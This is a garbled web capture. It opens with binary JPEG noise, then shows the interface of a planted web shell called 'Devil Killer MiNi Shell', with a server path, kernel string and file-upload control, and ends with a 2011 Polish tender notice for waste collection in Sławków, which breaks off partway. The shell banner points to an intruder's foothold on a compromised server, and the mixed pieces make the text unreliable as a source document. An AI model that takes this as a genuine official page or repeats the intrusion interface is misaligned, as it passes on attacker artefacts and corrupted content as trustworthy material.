JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111123/392664-N-2011.html

<p class="kh_header"><b>Sławków: Wywóz odpadów komunalnych segregowanych i niesegregowanych, wielkogabarytowych, niebezpiecznych, zużytego sprzętu AGD i RTV, biodegradacyjnych w tym odpady zielone z terenu miasta Sławkowa</b><br>
<b>Numer ogłoszenia: 392664 - 2011; data zamieszczenia: 23.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Sławkowa , ul. Rynek 1, 41-260 Sławków, woj. śląskie, tel. 032 2931552 w. 41, faks 032 2931233.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz odpadów komunalnych segregowanych i niesegregowanych, wielkogabarytowych, niebezpiecznych, zużytego sprzętu AGD i RTV, biodegradacyjnych w tym odpady zielone z terenu miasta Sławkowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia
a)	Przedmiotem zamówienia jest świadczenie usług w zakresie odbioru z terenu miasta Sławkowa odpadów komunalnych segregowanych i niesegregowanych, wielkogabarytowych, niebezpiecznych, zużytego sprzętu AGD i RTV, biodegradacyjnych, w tym odpady zielone, transport tych odpadów i ich składowanie.
-	Odpady mieszane w ilości: 3.000 ton rocznie
-	Odpady wysegregowane w ilości: 	Papier 	- 26 ton rocznie
Plastik - 12 ton rocznie
Szkło 	- 18 ton rocznie
Metal 	- 4 tony rocznie
-	Odpady biodegradacyjne w ilości: 50 ton rocznie
-	Odpady ponadgabarytowe w ilości: 80 ton rocznie
-	Zużyty sprzęt RTV i AGD w ilości: 6 ton rocznie
b)	Opróżnianie pojemników miejskich na odpady ogólne z poszczególnych rejonów całego miasta.
-	wywóz z terenów publicznych odpadów komunalnych gromadzonych w kontenerach na nieczystości
-	dla kontenerów ustala się wystąpienie obowiązku opróżniania wg harmonogramu (Załącznik Nr 10) oraz na każde zgłoszenie Zamawiającego
-	usunięcie odpadów zalegających obok pojemników podczas wykonywania usługi wywozu odpadów
-	czyszczenie miejsc zaśmieconych przy załadunku odpadów
-	wystawienie pojemników z odpadami ze stanowisk kontenerowych oraz ich ustawienie (w to samo miejsce po opróżnieniu)
c)	Opróżnianie pojemników miejskich na odpady wyselekcjonowane z poszczególnych rejonów całego miasta (tworzywo sztuczne, szkło, metal, papier, bioodpady).
-	wywóz z terenów publicznych odpadów wyselekcjonowanych wg harmonogramu (Załącznik Nr 9 )
-	usunięcie odpadów zalegających obok pojemników podczas wykonywania usługi wywozu odpadów
-	usunięcie odpadów wystawionych na stanowiska kontenerowe w workach
-	czyszczenie miejsc zaśmieconych przy załadunku odpadów
-	wystawienie pojemników z odpadami ze stanowisk kontenerowych oraz ich ustawienie (w to samo miejsce po opróżnieniu).
-	pojemniki na odpady biodegradacyjne będą ustawione na stanowiskach kontenerowych od maja do października
-	pojemniki na odpady wyselekcjonowane zapewnia Gmina Sławków
d)	Wyposażenie  stanowisk kontenerowych w pojemniki:
-	na odpady ogólne o pojemności: 0,120; 0,240; 1,1; 2,2 m3 (wg. harmonogramu, Załącznik Nr 10)
-	mycie i odkażanie pojemników będących własnością Wykonawcy, w miejscu odbioru odpadów z częstotliwością gwarantującą ich utrzymanie w należytym stanie sanitarnym - co najmniej dwa razy w roku
-	bieżąca konserwacja, naprawa lub wymiana zniszczonych pojemników (będących własnością Wykonawcy)
-	bieżące uzupełnianie brakujących pojemników na skutek kradzieży lub zniszczenia (wymiana i dostarczenie nowych pojemników odbywa się na koszt Wykonawcy)
e)	Raz w miesiącu zorganizowanie selekcji odpadów w systemie workowym z odbiorem odpadów bezpośrednio z gospodarstw domowych oraz wyposażenie gospodarstw domowych objętych harmonogramem wywozu w pojemniki na makulaturę.
-	obsługa mieszkańców Sławkowa z około 450 prywatnych posesji jednorodzinnych w systemie segregacji workowej polegającej na zbiórce z terenu miasta w oznakowanych workach odpadów segregowanych w grupach asortymentowych: tworzywo sztuczne, szkło
-	obsługa mieszkańców Sławkowa z około 450 prywatnych posesji jednorodzinnych w systemie segregacji pojemnikowej, polegającej na zbiórce z terenu miasta w oznakowanych pojemnikach odpadów segregowanych w grupie asortymentowej: papier
-	odbiór odpadów segregowanych będzie dokonywany jeden raz w miesiącu, w każdy trzeci wtorek miesiąca
-	wyposażenie gospodarstw domowych objętych harmonogramem wywozu w worki na plastik i szkło oraz w pojemniki na makulaturę, na koszt Wykonawcy
-	bieżąca współpraca z Zamawiającym w zakresie systemu doposażenia mieszkańców miasta deklarujących segregowanie odpadów, w pojemniki na makulaturę i worki na tworzywo sztuczne i szkło.
f)	Dwa razy w roku odbiór i utylizacja odpadów wielkogabarytowych (kwiecień,  październik).
-	zebranie wszystkich odpadów zgromadzonych w okolicach stanowisk kontenerowych oraz w miejscach wskazanych przez Zamawiającego
-	uporządkowanie terenu w promieniu 10 m od  miejsca zbiórki
-	wywóz zebranych odpadów na składowisko odpadów
-	terminy odbioru odpadów będą każdorazowo uzgadniane pomiędzy Zamawiającym i Wykonawcą.
g)	Jeden raz w roku odbiór odpadów zebranych w czasie Akcji Sprzątania Świata
h)	Odbiór i utylizacja odpadów niebezpiecznych z Gminnego Punktu Zbiórki Odpadów Niebezpiecznych jeden raz w miesiącu oraz na każde zgłoszenie Zamawiającego. Gminny Punkt Zbiórki Odpadów Niebezpiecznych będzie wyposażony w:
-	pojemnik na baterie rtęciowe i kadm.-niklowe, wykonany z PE-HD, pojemność 0,120 m3, 1 szt.;
-	pojemnik na zużyte oleje, wykonany z metalu ocynk., pojemność 1,1 m3, 2 szt.;
-	pojemnik na rozpuszczalniki, wykonany z metalu ocynk., pojemność 1,1 m3, 1 szt.;
-	pojemnik na farby i lakiery, wykonany z tworzywa sztucznego, pojemność        0,66 m3, 1 szt.;
-	pojemnik na aerozole, wykonany z PE-HD, pojemność 0,66 m3, 1 szt.;
-	pojemnik na przeterminowane lekarstwa, wykonany z metalu, pojemność 0,12 m3, 1 szt.;
-	pojemnik na środki ochrony roślin, wykonany z metalu ocynkowanego, pojemność 1,1 m3, 1 szt.;
-	pojemnik na zużyte akumulatory, wykonany z metalu ocynkowanego, pojemność 1,1 m3, 1 szt.;
-	pojemnik na zużyte świetlówki, wykonany z tworzywa sztuczn., pojemność 0,7 m3, 1 szt.;
-	pojemnik na inne odpady występujące w regionie, wykonany z PE-HD, pojemność 1,1 m3, 1 szt.
i)	Mechaniczne zamiatanie ulic miasta.
-	zamiatanie ulic występuje trzy razy w roku, dokładny termin ustala Zamawiający w porozumieniu z Wykonawcą,
-	oczyszczenie ulic polega na uprzątnięciu nieczystości z całej jezdni przy użyciu sprzętu mechanicznego, w szczególności śmieci zgromadzonych przy krawężnikach - zgodnie z Załącznikiem Nr 11 do SIWZ
-	sprzątanie mechaniczne winno się odbywać w sposób niepowodujący zapylenia najbliższego otoczenia
-	zebrane odpady należy wywieźć na składowisko odpadów.
j)	Wykonawca winien wykonać usługę w sposób rzetelny i estetyczny. W przypadku udokumentowanego nierzetelnego wykonania usługi, Zamawiający zastrzega sobie możliwość zlecenia usługi innemu podmiotowi na koszt Wykonawcy.
k)	Zaleca się, aby Wykonawca przed przygotowaniem oferty, zapoznał się z miejscem wykonania zamówienia tj. poprzez dokonanie wizji lokalnej, zadanie wszelkich pytań związanych z realizacją zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.40.00.00-1, 90.50.00.00-2, 90.51.10.00-2, 90.51.13.00-5, 90.51.14.00-6, 90.51.20.00-9, 90.51.31.00-7, 90.51.32.00-8, 90.52.00.00-8, 90.52.43.00-9, 90.60.00.00-3, 90.61.00.00-6, 90.91.80.00-5, 90.91.80.00-5, 90.92.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości 20 000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż posiada zezwolenia uprawniające do wykonywania działalności w zakresie objętym zamówieniem wraz ze stosownymi umowami ze składowiskami odpadów (bądź oświadczeniem Wykonawcy, że przed podpisaniem umowy z Zamawiającym będzie posiadał umowę o przejęcie odpadów na legalnym wysypisku śmieci).
	Aktualna informacja lub oświadczenie Wykonawcy o złożeniu informacji o wytwarzanych odpadach oraz o sposobach gospodarowania wytworzonymi odpadami sporządzona zgodnie z wymogami art. 24 ust. 4 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2001 r. Nr 62, poz.628 z późniejszymi zmianami) - zgodnie z Załącznikiem Nr 12
	Zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych na terenie Gminy Sławków zgodnie z ustawą z 13 września 1996 r. (Dz. U. z 2005r. Nr 236, poz. 2008, z późn. zm.) o utrzymaniu czystości i porządku w gminach (w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek musi spełniać każdy z Wykonawców) 
	Zezwolenie na prowadzenie działalności w zakresie transportu odpadów - obejmujące co najmniej teren miasta Sławkowa i tereny obejmujące trasy przewozu odpadów do miejsc ich odzysku lub unieszkodliwiania - w trybie art. 28 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2007 r. Nr 39, poz. 251 ze zmianami) wraz ze stosownymi umowami ze składowiskami odpadów bądź oświadczeniem Wykonawcy, że przed podpisaniem umowy z Zamawiającym będzie posiadał umowę o przejęcie odpadów na legalnym wysypisku śmieci. (w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek musi spełniać każdy z wykonawców) 	Zamawiający będzie oceniał spełnianie w/w warunków na podstawie złożonych przez Wykonawcę dokumentów i wykazów wymienionych w pkt. VI SIWZ według formuły spełnia / nie spełnia. Wykonawca nie spełniający w/w warunków zostanie wykluczony           z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, to w tym okresie, wykonał lub wykonuje co najmniej 2 usługi zgodne z przedmiotem zamówienia wraz z  podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz złączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane
należycie -  Załącznik Nr 4
	Zamawiający będzie oceniał spełnianie w/w warunków na podstawie złożonych przez Wykonawcę dokumentów i wykazów wymienionych w pkt. VI SIWZ według formuły spełnia / nie spełnia. Wykonawca nie spełniający w/w warunków zostanie wykluczony           z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż w celu realizacji zamówienia dysponować będzie wymaganym sprzętem, tj. co najmniej:
	pojazdem o ładowności do 3,5 tony z bezpylną zabudową specjalistyczną do zbierania odpadów - co najmniej 1 szt.
	Zamawiający będzie oceniał spełnianie w/w warunków na podstawie złożonych przez Wykonawcę dokumentów i wykazów wymienionych w pkt. VI SIWZ według formuły spełnia / nie spełnia. Wykonawca nie spełniający w/w warunków zostanie wykluczony           z postępowania. 
	pojazdem ciężarowym z zabudową do zbierania i przewozu do odpadów komunalnych - co najmniej 1 szt.
	pojazdem przystosowanym do przewozu odpadów niebezpiecznych zgodnie z ustawą o przewozie drogowym towarów niebezpiecznych z dnia 28 października 2002 r. (Dz. U. z 2002, Nr 199, poz. 1971 z późn. zm.) - 1 szt.
	pojazdem ciężarowym z zabudową hakową z HDS - 1 szt.
	pojazdem ciężarowym samowyładowczym z HDS - 1 szt.
	zamiatarką uliczną mechaniczną o wydajności min. 3.500 m2 /godz. - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż w celu realizacji zamówienia dysponować będzie osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie i kwalifikacje zawodowe, (Załącznik Nr 6) tj. co najmniej:
	Zamawiający będzie oceniał spełnianie w/w warunków na podstawie złożonych przez Wykonawcę dokumentów i wykazów wymienionych w pkt. VI SIWZ według formuły spełnia / nie spełnia. Wykonawca nie spełniający w/w warunków zostanie wykluczony           z postępowania. 

-	1 osoba do pełnienia funkcji koordynatora prac - osoba ta odpowiedzialna będzie za terminowe i prawidłowe wykonanie zamówienia. Osoba wskazana w ofercie, jako odpowiedzialna za realizację zamówienia ze strony Wykonawcy usług zostanie wpisana do treści umowy o wykonanie usługi. 
-	1 osoba posiadająca świadectwo kwalifikacji w zakresie doradcy ds. bezpieczeństwa w transporcie odpadów niebezpiecznych.
-	2 osoby posiadające uprawnienia dźwigowe do obsługi sprzętu specjalistycznego tj. dźwigu HDS.
-	2 osoby z zaświadczeniem ukończenia kursu przewozu materiałów niebezpiecznych ADR.
-	5 osób do wykonywania pozostałych prac stanowiących przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż:
	Posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia o wartości co najmniej 100 000,00 zł.
	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej,                             w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy              o wartości co najmniej 1.000.000,00 zł, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
	Zamawiający będzie oceniał spełnianie w/w warunków na podstawie złożonych przez Wykonawcę dokumentów i wykazów wymienionych w pkt. VI SIWZ według formuły spełnia / nie spełnia. Wykonawca nie spełniający w/w warunków zostanie wykluczony           z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dodatkowo Wykonawca winien dołączy do oferty następujące dokumenty:
a)	Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona do reprezentowania Wykonawcy - w oryginale lub poświadczone notarialnie, lub zaopatrzone adnotacją za zgodność z oryginałem, pieczęcią i podpisem Wykonawcy,
b)	Wypełniony przez Wykonawcę Formularz ofertowy - w oparciu o Załącznik Nr 1 do SIWZ.
c)	Zaparafowany projekt umowy. (Załącznik Nr 8).
	Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymienionych w pkt 2 niniejszego rozdziału, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy Pzp, o ile te podmioty będą brały udział w realizacji zamówienia.
	Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom (jeżeli są przewidywani - załączyć Załącznik Nr 7 do SIWZ). Jeżeli Wykonawca nie zamierza korzystać z podwykonawców, należy również dołączyć załącznik z adnotacją -nie dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
